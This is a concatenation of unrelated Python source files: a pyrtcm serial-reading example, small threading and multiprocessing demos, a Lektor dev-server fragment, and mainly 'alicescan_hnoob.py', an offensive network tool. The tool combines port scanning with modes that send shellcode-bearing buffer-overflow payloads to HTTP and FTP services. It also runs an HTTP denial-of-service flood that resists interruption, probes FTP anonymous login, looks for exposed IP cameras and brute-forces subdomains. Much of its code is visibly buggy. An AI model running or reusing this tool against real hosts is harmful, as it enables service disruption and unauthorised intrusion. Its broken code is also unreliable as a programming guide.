ECHO_SERVER_HOST, ECHO_SERVER_PORT))
input()
|
rtcmserial.py
|
"""
rtcmpoller.py
This example illustrates a simple implementation of a
'pseudo-concurrent' threaded RTCMMessage streaming utility.
(NB: Since Python implements a Global Interpreter Lock (GIL),
threads are not truly concurrent.)
It connects to the receiver's serial port and sets up a
RTCMReader read thread.
Created on 14 Feb 2022
:author: semuadmin
:copyright: SEMU Consulting © 2022
:license: BSD 3-Clause
"""
# pylint: disable=invalid-name
from sys import platform
from io import BufferedReader
from threading import Thread, Lock
from time import sleep
from serial import Serial
from pyrtcm import (
RTCMReader,
)
# initialise global variables
reading = False
def read_messages(stream, lock, rtcmreader):
"""
Reads, parses and prints out incoming rtcm messages
"""
# pylint: disable=unused-variable, broad-except
while reading:
if stream.in_waiting:
try:
lock.acquire()
(raw_data, parsed_data) = rtcmreader.read()
lock.release()
if parsed_data:
print(parsed_data)
except Exception as err:
print(f"\n\nSomething went wrong {err}\n\n")
continue
def start_thread(stream, lock, rtcmreader):
"""
Start read thread
"""
thr = Thread(target=read_messages, args=(stream, lock, rtcmreader), daemon=True)
thr.start()
return thr
def send_message(stream, lock, message):
"""
Send message to device
"""
lock.acquire()
stream.write(message.serialize())
lock.release()
if __name__ == "__main__":
# set port, baudrate and timeout to suit your device configuration
if platform == "win32": # Windows
port = "COM13"
elif platform == "darwin": # MacOS
port = "/dev/tty.usbmodem14101"
else: # Linux
port = "/dev/ttyACM1"
baudrate = 9600
timeout = 0.1
with Serial(port, baudrate, timeout=timeout) as ser:
# create rtcmReader instance, reading only rtcm messages
rtr = RTCMReader(BufferedReader(ser))
print("\nStarting read thread...\n")
reading = True
serial_lock = Lock()
read_thread = start_thread(ser, serial_lock, rtr)
print("\nPolling complete. Pausing for any final responses...\n")
sleep(1)
print("\nStopping reader thread...\n")
reading = False
read_thread.join()
print("\nProcessing Complete")
|
1.py
|
from multiprocessing import Process, freeze_support
def f():
print('hello world!')
if __name__ == '__main__':
freeze_support()
Process(target=f).start()
|
demo2.py
|
# -*- coding: utf-8 -*-
"""
多线程
threading Thread类创建线程
"""
from random import randint
from threading import Thread
from time import time, sleep
def download(filename):
print('开始下载%s...' % filename)
time_to_download = randint(5, 10)
sleep(time_to_download)
print('%s下载完成!耗费了%d秒' % (filename, time_to_download))
def main():
start = time()
t1 = Thread(target=download, args=('Python从入门到住院.pdf',))
t1.start()
t2 = Thread(target=download, args=('Peking hot.avi',))
t2.start()
t1.join()
t2.join()
end = time()
print('总共耗费了%.3f秒' % (end - start))
if __name__ == '__main__':
main()
|
alicescan_hnoob.py
|
from scapy.all import *
import socket
import sys
import time
import os
import random
import argparse
from threading import Thread
import binascii
from multiprocessing.dummy import Pool as ThreadPool
# Project Alice #1 Port Scan
def check(dest, port, services):
def umast():
scanned = []
_port_checked = sr1(IP(dst=dest)/TCP(dport=int(port), sport=555), timeout=0.5, verbose=0)
if _port_checked != None:
if _port_checked.haslayer(TCP):
if _port_checked[TCP].flags == 18:
state = "Opened"
def get(dest, port):
if ':' in dest:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((dest, int(port)))
sock.send("bytes\r\n".encode())
#sock.send("byte1\r\n".encode())
try:
sock.settimeout(5)
data = sock.recv(14812421).decode()
return data
except:
data = "None"
return data
#print(state)
#print(services)
if int(port) == 80:
if services == "ip-camera-find":
print("[*] Searching %s for cameras. . . " %(dest,))
def check(IP, port):
database = ["control/camerainfo"]
#print("18912794821794812789421")
for contents in database:
print("[*] Requesting: %s "%(database[0]) + "through IP: %s " %(socket.gethostbyname(IP)))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
#print(port)
sock.connect((IP, int(port)))
payload = "GET /%s HTTP/1.1\r\n" % (contents)
payload += "Accept: */*\r\n"
payload += "User-Agent: Xenu Link Sleuth/1.3.8\r\n"
payload += "Host: %s \r\n" %(IP,)
payload += "Cache-Control: no-cache\r\n\r\n\r\n"
#print(payload)
sock.send(payload.encode())
rcv = sock.recv(1481243).decode()
return rcv
check = check(IP=dest, port=port)
print("\x0A")
if "200 OK" in check:
print("[+] IP Camera Discovered!")
print("\x0A")
elif services == "enc-bof-allvers":
print("[*] Creating mutliple shellcodes + broken encoders . . .")
def create_code(amount):
buff = []
while len(buff) < 4:
buff.append("A" * amount + "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0e\x30\x01\x90\x49\x1a\x92\x1a\x08\x27\xc2\x51\x03\x37\x01\xdf\x2f\x62\x69\x6e\x2f\x2f\x73\x68")
return buff
create = create_code(amount=100)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((dest, int(port)))
for bytes in create:
print("[*] Sending total bytes: %s " %(len(bytes)) + " in bits: %s " %(len(bytes)*8))
sock.send(bytes.encode())
print("[*] Sending invalid encoders .. . ")
def create_socket(IPv4, IPv6):
if IPv4 != False:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
return sock
else:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tco"))
return sock
sock.close()
sock2 = create_socket(IPv4=True, IPv6=False)
sock2.connect((dest, int(port)))
#payload += "Accept-Encoding: 'doar-e, ftw, imo, ,'"
payload = "GET / HTTP/1.1\r\n"
payload += "Accept: */*\r\n"
payload += f"User-Agent: Alice Project Hnoob/20.1.8/x64-bit/{os.name}/Webbrowser-socket-crawler\r\n"
payload += "Host: %s \r\n" %(dest,)
payload += "Accept-Encoding: 'doar-e, ftw, imo, ,'"
payload += "Cache-Control: no-cache\r\n\r\n\r\n"
sock2.send(payload.encode())
data = sock2.recv(18124).decode()
print('''
Bytes:%d
Bits: %d
----------
Hexadecimal: %s ====> %s ''' %(len(data), len(data)*8, binascii.hexlify(data.encode()), binascii.unhexlify(binascii.hexlify(data.encode()))))
elif services == "http-dos":
user_agents = ["Alice Webkit/x64", "Alice//x64", "Alice WIN-NT/compt/Firefox/x64", "Linux /x86/Firefox", "Webcrawler-Allice Web/kit", "Alice Project Hnoob/20.1.8/x64-bit/wbbsocketcrawler"]
print("[*] Preparing to attack ==> %s " %(dest,) + " | Press CTRL+C Whereever you want to stop!")
def create_socket(IPv4, IPv6):
if IPv4 != False:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
else:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
return sock
socks = create_socket(IPv4=True, IPv6=False)
socks.connect((dest, int(port)))
payloads = f"GET /{64 * 120 + 256 - 8 - 1 + 4} HTTP/1.1\r\n"
payloads += "Accept: */*\r\n"
payloads += f"User-Agent: {random.choice(user_agents)}\r\n"
payloads += "Host: %s \r\n" %(dest,)
payloads += "Accept-Encoding: %d \r\n" %(64 * 120 + 256 - 8 - 1 + 4)
payloads += "Cache-Control: no-cache\r\n\r\n\r\n"
payload = []
gathered = 0
while len(payload) < 500:
payload.append(payloads)
try:
for xz in range(random.randint(10000, 200000)):
for payloads in payload:
try:
#print("[*] Sending => %d bytes" %(len(payloads)))
socks.send(payloads.encode())
except KeyboardInterrupt:
break
except ConnectionResetError:
socks.close()
socks = create_socket(IPv4=True, IPv6=False)
socks.connect((dest, int(port)))
except KeyboardInterrupt:
print("[-] Cannot exit now!")
pass
elif services == "dns-brute":
print("[*] Preparing to attack ==> %s " %(dest,))
os.chdir("lists")
words = []
with open("wordlist_subdomain_10mil.txt", 'r') as file:
for lines in file:
word = lines.strip()
words.append(word)
def checks(domain, target, port):
def create_socket(IPv4):
if IPv4 != False:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
else:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
return sock
sock_ipv4 = create_socket(IPv4=True)
try:
conver = socket.gethostbyaddr(target)[0]
#target_dns = conver[0]
consr = conver.split(".")
if len(consr) > 3:
combs = consr[2] + "." + consr[3]
#print("12412264789641248912894124678")
#print(combs)
return combs
else:
combs = consr[1] + "." + consr[2]
return combs
except:
print("\x0A")
print("[-] Couldn't get Address entry point . . ")
print("\x0A")
combs = input("[*] Enter hostname by yourself: ")
return combs
def enumerats(target, domain, falsive):
combs = domain +"." +target
def check_con_to_host(target):
def create_sock(IPv4):
if IPv4 != False:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
else:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
return sock
sock = create_sock(IPv4=True)
if falsive == True:
try:
sock.settimeout(1)
sock.connect((target, 80))
payloads = f"GET / HTTP/1.1\r\n"
payloads += "Accept: */*\r\n"
payloads += f"User-Agent: Alice Project/Webcrawler1.1 \r\n"
payloads += "Host: %s \r\n" %(target,)
payloads += "Accept-Encoding: 'en_US' \r\n"
payloads += "Cache-Control: no-cache\r\n\r\n\r\n"
sock.send(payloads.encode())
data = sock.recv(148142).decode()
if '200 OK' in data:
return "[+] %s exists . .. IP Entry Address: %s" %(target,socket.gethostbyname(target) + " Bytes recieved: %d Bits: %d" %(len(data), len(data)*8))
elif '301 Moved' in data:
return "[+] %s exists . .. IP Entry Address: %s" %(target,socket.gethostbyname(target) + " Bytes recieved: %d Bits: %d" %(len(data), len(data)*8))
elif '302 Found' in data:
return "[+] %s exists . .. IP Entry Address: %s" %(target,socket.gethostbyname(target) + " Bytes recieved: %d Bits: %d" %(len(data), len(data)*8))
else:
print(data)
return "[x] %s doesn't exists . .. " %(target,)
except Exception:
return "[x] %s doesn't exists .. . " %(target,)
else:
try:
sock.settimeout(1)
sock.connect((target, 80))
return "[+] %s exists . .. IP Entry Address: %s" %(target,socket.gethostbyname(target))
except Exception:
#print(f)
return "[x] %s doesn't exists . . " %(target)
check_connection = check_con_to_host(target=combs)
return check_connection
apps =[]
ip = checks(domain="var", target=dest, port=80)
print("\x0A")
print("[*] Big flow of data incoming!")
y_n = input("[?] Do you want to not show the data or show the flow (y/n): ")
print("\x0A")
y_n2 = input("[?] Do you want to send useragents, requests to see what codes the services are returning (y/n): ")
y_n2 = y_n2.lower()
y_n = y_n.lower()
if y_n2 == "y":
falsive = True
else:
falsive = False
for cons in words:
enum = enumerats(target=ip, domain=cons, falsive=falsive)
if y_n == 'y':
apps.append(enum)
else:
print(enum)
elif services != False:
get_vers = get(dest=dest, port=int(port))
get_vers = get_vers.lower().strip()
print(get_vers)
if 'apache' in get_vers:
version = "Apache"
elif 'nginx' in get_vers:
version = "Nginx"
else:
version = "Unknown"
#ip-camera-find
else:
version = "Unknown"
service = "HTTP"
if int(port) == 21:
if services == "FTP-bof":
print("[*] Checking Buffer Overflow . .. . ")
def buffer_create(amount):
if os.name == "posix":
buff = [] # DIR in windows which is equivelent to this buffer. So It means jne sys call ret int ret, which int is 2E, lets give the buffer a little
else:
buff = []
while len(buff) < 3:
singo = "\x75\x6e\x6c\x75\x63\x6b\x79\x20\x6f\x72\x20\x6c\x75\x63\x36\xb7\x92\x06\x46\x17\x92"
rce = "\x44\x49\x52"
#xz = binascii.hexlify("ls".encode()).decode()
#print(xz)
rce = "\x6c\x73"
buff.append(rce + "\x0A" + "A"*amount + "\x75\x03\x0f\x05\xC3\xCD\x2E\x0A"+rce)
return buff
create_ = buffer_create(amount=1000)
for contents in create_:
print("[*] Sending total bytes: %d " %(len(contents)))
if ':' in dest:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((dest, int(port)))
datax = sock.recv(18412)
sock.send(contents.encode())
try:
sock.settimeout(5)
dat = sock.recv(12481).decode()
if '500' in dat:
print("[-] Command not understood. Probably, make A more?")
elif '530' in dat:
print("[-] Exploitation didn't worked out .. . ")
else:
print(dat)
except Exception as f:
print(f)
print("[-] None . . . ")
pass
elif services == "FTP-anon":
print("[*] Checking Anonymous Login . . .")
def anon_check(dest, port, timeout):
if ':' in dest:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((dest, int(port)))
data = "USER Anonymous\r\nPASS Anonymous\r\n"
sock.recv(148212).decode()
sock.send(data.encode())
data_1 = sock.recv(14121).decode()
#print(data_1)
if 'Anonymous user logged in' in data_1:
return "[+] Anonymous login is enabled!"
else:
return "[-] Anonymous login is disabled!"
ano = anon_check(dest=dest, port=port, timeout=5)
print(ano)
elif services == "FTP-login":
print("[*] Checking banners and answers .. . ")
def login_check(dest, port, timeout):
if ':' in dest:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((dest, int(port)))
data = "USER 123\r\nPASS 321\r\n"
xr = sock.recv(14812).decode().lower()
#print(xr)
if 'pure' in xr:
print("[*] Version is PureFTPD")
sock.send(data.encode())
data = sock.recv(124812311).decode().lower()
data2 = sock.recv(12418412).decode().lower()
# print(data2)
if '331' in data:
banner1 = "[+] 1st banner is 331"
if '530' in data2:
banner = "[+] Banner is 530"
if 'login incorrect' in data2:
msg = "[+] Message: Login Incorrect!"
return banner1 + "\n" + banner + "\n"+ msg
ano = login_check(dest=dest, port=port, timeout=5)
print(ano)
service = "FTP"
version = "Unknown"
else:
service = "Unknown"
version = "Unknown"
if int(port) == 22:
if services != False:
get_vers = get(dest=dest, port=int(port))
get_vers = get_vers.lower()
if 'openssh' in get_vers:
version = "OpenSSH"
else:
version = "Unknown"
service = "SSH"
elif int(port) == 25:
if services != False:
get_vers = get(dest=dest, port=int(port))
get_vers = get_vers.lower()
if 'esmtp exim' in get_vers:
version = "ESMTP Exim"
else:
version = "Unknown"
else:
version = "Unknown"
elif int(port) == 8080:
if services == "ip-camera-find":
print("[*] Checking IP Camera access . .. .")
def camera(IP, port):
#database = ["control/camerainfo"]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((dest, port))
payload = "GET / HTTP/1.1\r\n"
payload += "Accept: */*\r\n"
if os.name == "posix":
system = "POSIX-x86"
else:
system = "WIN-NTX64"
payload += f"User-Agent: Alice Project x64-bit/{system}/web-crawler/version/1.3.8/MSG:'You are all going to die down here!'\r\n"
payload += "Host: %s \r\n" %(IP,)
payload += "Cache-Control: no-cache\r\n\r\n\r\n"
sock.send(payload.encode())
rcv = sock.recv(18412).decode()
return rcv
check = camera(IP=dest, port=int(port))
service = "HTTP-PROXY"
if '200 OK' in check:
print("[+] Camera access is availiable!")
elif 'webcamXP 5' in check:
print("[+] Camera access is availiable!")
version = "webcamXP 5"
else:
print(check)
elif services != False:
get_vers = get(dest=dest, port=int(port))
get_vers = get_vers.lower()
if "apache" in get_vers:
service = "HTTP-PROXY"
else:
service = "HTTP-PROXY"
elif int(port) == 8084:
if services == "ip-camera-find":
print("[*] Checking IP Camera access . . .. ")
def camera(IP, port):
sock =socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((IP, port))
payload = "GET /gallery.html HTTP/1.1\r\n"
payload += "Accept: */*\r\n"
payload += "User-Agent: Alice Project Hnoob/20.1.8\r\n"
payload += "Host: %s \r\n" %(IP,)
payload += "Cache-Control: no-cache\r\n\r\n\r\n"
sock.send(payload.encode())
rcv = sock.recv(1321312).decode()
#print(rcv)
return rcv
check = camera(IP=dest, port=int(port))
if 'webcamXP 5' in check:
print("[+] Camera aacess is availiable!")
elif '200 OK' in check:
print("[+] Camera access is availiable!")
else:
if services == "ip-camera-find":
print("[*] Checking IP Camera Access . .. . ")
def camera(IP, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((IP, int(port)))
payload = "GET /gallery.html HTTP/1.1\r\n"
payload += "Accept: */*\r\n"
payload += f"User-Agent: Alice Project Hnoob/20.1.8/x64-bit/{os.name}/Webbrowser-socket-crawler\r\n"
payload += "Host: %s \r\n" %(IP,)
payload += "Cache-Control: no-cache\r\n\r\n\r\n"
sock.send(payload.encode())
recv = sock.recv(128412421).decode()
return recv
chk = camera(IP=dest, port=port)
if 'webcamXP 5' in check:
print("[+] Camera access is availiable!")
elif '200 OK' in check:
print("[+] Camera acess is availiable!")
else:
if int(port) == 80:
service = "HTTP"
state = "Closed"
version = "Unknown"
elif int(port) == 21:
service = "FTP"
state = "Closed"
version = "Unknown"
else:
service = "Unknown"
state = "Closed"
version = "Unknown"
print('''
Target: %s
[Port] [ State ] [Service] [ Version ]
%d %s %s %s
''' %(dest, int(port), state, service, version))
sys.exit(5)
threads = Thread(target=umast)
vr = threads.start()
def init_1(dest, version, verbose, service_scan, ranging, output):
#print(dest)
if output != None:
ols = open(output, 'w')
else:
ols = None
version_ip = version
def umast():
timer = 0
if ols != None:
ols.write('''
Alice [Initiated Scan] on host ===> %s
Total ports to scan: %d''' %(dest, int(ranging)))
print('''
Alice [Initiated Scan] on host hive: %s
=============================================
Total ports remaining: [%s] ''' %(dest,ranging))
versioner = []
for porting in range(int(ranging)):
#print(porting)
#print(dest)
pkt = sr1(IP(dst=dest)/TCP(dport=porting, sport=555), timeout=0.3, verbose=0)
#print(porting)
timer += 1
def get(dest, port, timeout, version):
version_ip = version
if version_ip == "IPv6":
_sock_ = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
else:
_sock_ = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
_sock_.connect((dest, int(porting)))
_sock_.settimeout(timeout)
_sock_.send("GET /DATA HTTP/1.1\n".encode())
_sock_.send("LOL\n".encode())
try:
recv = _sock_.recv(14821).decode()
except Exception as f:
print(f)
return "None"
return recv
if pkt != None:
if pkt.haslayer(TCP):
if pkt[TCP].flags == 18:
print('''
Discovored a port opened %d on hive [%s]''' %(porting, dest))
#print("DASSADA")
state = "Open"
if int(porting) == 80:
#print("12347861287412")
print(service_scan)
if service_scan == "ip-camera-find":
print("[*] Checking for camera access . .. ")
def ip_camera(IP, port, timeout):
database = ["control/camerainfo"]
for contents in database:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((IP, int(port)))
payload = "GET /%s HTTP/1.1\r\n" % (contents)
payload += "Accept: */*\r\n"
payload += "User-Agent: Xenu Link Sleuth/1.3.8\r\n"
payload += "Host: %s \r\n" %(IP,)
payload += "Cache-Control: no-cache\r\n\r\n\r\n"
sock.send(payload.encode())
data = sock.recv(18412).decode()
check = ip_camera(IP=dest, port=porting, timeout=5)
if check != None:
if '200 OK' in check:
print("[*] Access to camera availiable!")
else:
print('[-] No access to camera found on port %d ' %(porting))
elif service_scan != "off":
get_vers = get(dest=dest, port=porting, timeout=5, version=version_ip)
get_vers = get_vers.lower()
else:
get_vers = "off"
if 'nginx' in get_vers:
version = "Nginx"
service = "HTTP"
elif 'apache' in get_vers:
version = "Apache"
service = "HTTP"
elif get_vers == "off":
version = "Off"
service = "HTTP"
else:
version = "Unknown"
service = "HTTP"
versioner.append(f'''
\x20{porting}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{state}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{service}\x20\x20\x20\x20\x20\x20{version}''')
elif int(porting) == 21:
#print("213961284612879412789")
#print(service_scan)
if service_scan != "off":
get_vers = get(dest=dest, port=porting, timeout=5, version=version_ip)
get_vers = get_vers.lower()
elif service_scan == "FTP-anon":
def get(dest, port):
data = "USER Anonymous\r\nPASS Anonymous\r\n"
if ':' in dest:
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((dest, int(port)))
sock.recv(14812).decode()
sock.send(data.encode())
dt = sock.recv(12312123).decode()
if 'Anonymous user logged in' in dt:
return "[+] Anonymous login enabled!"
else:
return "[-] Anonymous login disabled!"
get_ban = get(dest=dest, port=porting)
print(get_ban)
#get_vers = get_ban.lower()
#print(get_vers)
else:
get_vers = "off"
if 'pure' in get_vers:
version = "PureFTPD"
service = "FTP"
if 'anonymous' in get_vers:
version = get_vers
service = "FTP"
elif 'pro' in get_vers:
version = "ProFTPD"
service = "FTP"
elif get_vers == "off":
version = "off"
service = "Off"
else:
version = "Unknown"
service = "FTP"
versioner.append(f'''
\x20{porting}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{state}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{service}\x20\x20\x20\x20\x20\x20{version}''')
elif int(porting) == 8080:
if service_scan == "ip-camera-find":
print("[*] Checking for camera .. . ")
def IP_camera(IP, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((IP, int(port)))
payload = "GET /%s HTTP/1.1\r\n" % (contents)
payload += "Accept: */*\r\n"
payload += "User-Agent: Xenu Link Sleuth/1.3.8\r\n"
payload += "Host: %s \r\n" %(IP,)
payload += "Cache-Control: no-cache\r\n\r\n\r\n"
sock.send(payload.encode())
rcv = sock.recv(1284124).decode()
return rcv
check = IP_camera(IP=dest, port=porting)
if 'webcam' in check:
print("[*] Webcam access availiable!")
service = "HTTP-PROXY"
version = "unknown"
elif service_scan != "off":
service = "HTTP-PROXY"
def get(IP, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.getprotobyname("tcp"))
sock.connect((IP, int(port)))
sock.send("bytesofdata\r\n".encode())
rcv = sock.recv(141221).decode()
vers = get(IP=dest, port=porting)
vers = vers.lower()
if 'apache' in vers:
version = "Apache"
else:
version = "Unknown"
versioner.append(f'''
\x20{porting}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{state}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{service}\x20\x20\x20\x20\x20\x20{version}''')
elif int(porting) == 22:
#print("12347861287412")
if service_scan != "off":
get_vers = get(dest=dest, port=porting, timeout=5, version=version_ip)
get_vers = get_vers.lower()
else:
get_vers = "off"
if 'openssh' in get_vers:
version = "OpenSSH"
service = "SSH"
elif get_vers == "off":
version = "off"
service = "SSH"
else:
version = "Unknown"
service = "SSH"
versioner.append(f'''
\x20{porting}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{state}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{service}\x20\x20\x20\x20\x20\x20{version}''')
else:
version = "Unknown"
service = "Unknown"
versioner.append(f'''
\x20{porting}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{state}\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20{service}\x20\x20\x20\x20\x20\x20{version}''')
#print(versioner)
print('''
Target: %s
Time Elapsed: %d
Port State Service Version ''' %(dest, timer))
for crisis in versioner:
if ols != None:
ols.write('''
%s'''%(crisis))
print(crisis)
if ols != None:
ols.close()
threads = Thread(target=umast)
threading.MAX_TIMEOUT = 0
threads.start()
def __main__():
parsie = argparse.ArgumentParser()
parsie.add_argument("-t", "--target", help='Specify IPv4, IPv6 Address, DNS. E.G --target google.com or --target "google.com, host.com"',required=True)
parsie.add_argument("-sV", "--servicevers", help="Service || Version Enumeration of the provided target. Default: Off | Usage: --servicevers on", default="off", required=False)
parsie.add_argument("-r", "--rangeport", help="Specify a maximum range - Default is 1000 ports", default=1000,required=False)
parsie.add_argument('-p', "--port", help="Specify a specific port to be checked", default=0, required=False)
parsie.add_argument("-v", "--vulners", help="type - --vulners help for more help", default=None)
parsie.add_argument("-o", "--output", help="Argument a name of a file. E.G --output file.txt | Default: none",default=None, required=False)
args = parsie.parse_args()
target = args.target
serivevers = args.servicevers
rangeport = args.rangeport
port = args.port
vulnery = args.vulners
if vulnery == "help":
print('''
[Modes that are active]
1. ftp-anon-auth : Checks for FTP Anonymous Authentication.
2. ftp-auth-login : Checks for FTP Login Answers, Banners.
3. ftp-bof-allvers : Checks for Buffer Overflow (BOF - Stack Overflow) Vulnerability - With injecting specific code.
4. ip-camera-find : Checks for a camera entry through IP or Hostname.
5. enc-bof-allvers : Checks for HTTP Buffer Overflow (BOF - Stack Overflow) Vulnerability - With sending broken, bad chars or exceeds the limit of them.
6. http-dos : Denial Of Service Attack.
7. dns-brute : Domain Name System brute force attack.
''')
sys.exit(1)
output = args.output
if port != 0:
if ',' in target:
if serivevers != "off":
splitted = target.split(",")
for targets in splitted:
returned_code = check(dest=targets, port=port)
sys.exit(5)
#print(returned_code)
else:
if serivevers != "off":
if vulnery != None:
if vulnery == "ftp-anon-auth":
returned_code = check(dest=target, port=port, services="FTP-anon")
elif vulnery == "ftp-bof-allvers":
returned_code = check(dest=target, port=port, services="FTP-bof")
elif vulnery == "ftp-auth-login":
returned_code = check(dest=target, port=port, services="FTP-login")
elif vulnery == "ip-camera-find":
returned_code = check(dest=target, port=port, services="ip-camera-find")
elif vulnery == "enc-bof-allvers":
returned_code = check(dest=target, port=port, services="enc-bof-allvers")
elif vulnery == "http-dos":
returned_code = check(dest=target, port=port, services="http-dos")
elif vulnery == "dns-brute":
returned_code = check(dest=target, port=port, services="dns-brute")
else:
returned_code = check(dest=target, port=port, services=True)
sys.exit(5)
else:
if vulnery != None:
if vulnery == "ftp-anon-login":
returned_code = check(dest=target, port=port, services="FTP-anon")
elif vulnery == "ftp-bof-allvers":
returned_code = check(dest=target, port=port, services="FTP-bof")
elif vulnery == "ftp-auth-login":
returned_code = check(dest=target, port=port, services="FTP-login")
elif vulnery == "ip-camera-find":
returned_code = check(dest=target, port=port, services="ip-camera-find")
else:
returned_code = check(dest=target, port=port, services=False)
sys.exit(5)
#print(returned_code)
if serivevers != "off":
if ',' in target:
splitted = target.split(",")
#print(splitted)
for target_protoc in splitted:
#print(target_protoc)
if ':' in target_protoc:
addr = "IPv6"
else:
addr = "IPv4"
target_protoc = target_protoc.strip()
init_1(dest=target_protoc, version=addr, verbose=1, service_scan="on", ranging=rangeport, output=output)
else:
if ':' in target:
addr = "IPv6"
else:
addr = "IPv4"
if vulnery != None:
if vulnery == "ftp-anon-login":
init_1(dest=target, version=addr, verbose=1, service_scan="FTP-anon", ranging=rangeport, output=otuput)
elif vulnery == "ftp-bof-allvers":
init_1(dest=target, version=addr, verbose=1, service_scan="ftp-bof-allvers", ranging=rangeport, output=output)
elif vulnery == "ip-camera-find":
init_1(dest=target, version=addr, verbose=1, service_scan="ip-camera-find", ranging=rangeport, output=output)
else:
init_1(dest=target, version=addr, verbose=1, service_scan="on", ranging=rangeport, output=output)
else:
if ',' in target:
splitted = target.split(',')
for target_protoc in splitted:
#print(target_protoc)
if ':' in target_protoc:
addr = "IPv6"
else:
addr = "IPv4"
target_protoc = target_protoc.strip()
init_1(dest=target_protoc, version=addr, verbose=1, service_scan="off", ranging=rangeport, output=output)
else:
if ':' in target:
addr = "IPv6"
else:
addr = "IPv4"
if vulnery != None:
if vulnery == "ftp-anon-auth":
init_1(dest=target, version=addr, verbose=1, service_scan="FTP-anon", ranging=rangeport, output=output)
elif vulnery == "ftp-bof-allvers":
init_1(dest=target, version=addr, verbose=1, service_scan="ftp-bof-allvers", ranging=rangeport, output=output)
elif vulnery == "ip-camera-find":
init_1(dest=target, version=addr, verbose=1, service_scan="ip-camera-find", ranging=rangeport, output=output)
else:
init_1(dest=target, version=addr, verbose=1, service_scan="off", ranging=rangeport, output=output)
__main__()
|
devserver.py
|
import os
import time
import traceback
import threading
from werkzeug.serving import run_simple, WSGIRequestHandler
from lektor.db import Database, DatabaseCache
from lektor.builder import Builder, process_extra_flags
from lektor.watcher import Watcher
from lektor.reporter import CliReporter
from lektor.admin import WebAdmin
from lektor.utils import portable_popen
_os_alt_seps = list(sep for sep in [os.path.sep, os.path.altsep]
if sep not in (None, '/'))
class SilentWSGIRequestHandler(WSGIRequestHandler):
def log(self, type, message, *args):
pass
class BackgroundBuilder(threading.Thread):
def __init__(self, env, output_path, prune=True, verbosity=0,
extra_flags=None):
threading.Thread.__init__(self)
watcher = Watcher(env, output_path)
watcher.observer.start()
self.env = env
self.watcher = watcher
self.output_path = output_path
self.prune = prune
self.verbosity = verbosity
self.last_build = time.time()
self.extra_flags = extra_flags
def build(self, update_source_info_first=False):
try:
db = Database(self.env)
builder = Builder(db.new_pad(), self.output_path,
extra_flags=self.extra_flags)
if update_source_info_first:
builder.update_all_source_infos()
builder.build_all()
if self.prune:
builder.prune()
except Exception:
traceback.print_exc()
else:
self.last_build = time.time()
def run(self):
with CliReporter(self.env, verbosity=self.verbosity):
self.build(update_source_info_first=True)
for ts, eventtype, absolute_filename_w_path in self.watcher:
DatabaseCache.purge_cache()
if self.last_build is None or ts > self.last_build:
self.build()
class DevTools(object):
"""This provides extra helpers for launching tools such as webpack."""
def __init__(self, env):
self.watcher = None
self.env = env
def start(self):
if self.watcher is not None:
return
from lektor import admin
admin = os.path.dirname(admin.__file__)
portable_popen(['npm', 'install', '.'], cwd=admin).wait()
self.watcher = portable_popen([os.path.join(
admin, 'node_modules/.bin/webpack'), '--watch'],
cwd=os.path.join(admin, 'static'))
def stop(self):
if self.watcher is None:
return
self.watcher.kill()
self.watcher.wait()
self.watcher = None
def browse_to_address(addr):
import webbrowser
def browse():
time.sleep(1)
webbrowser.open('http://%s:%s' % addr)
t = threading.Thread(target=browse)
t.setDaemon(True)
t.start()
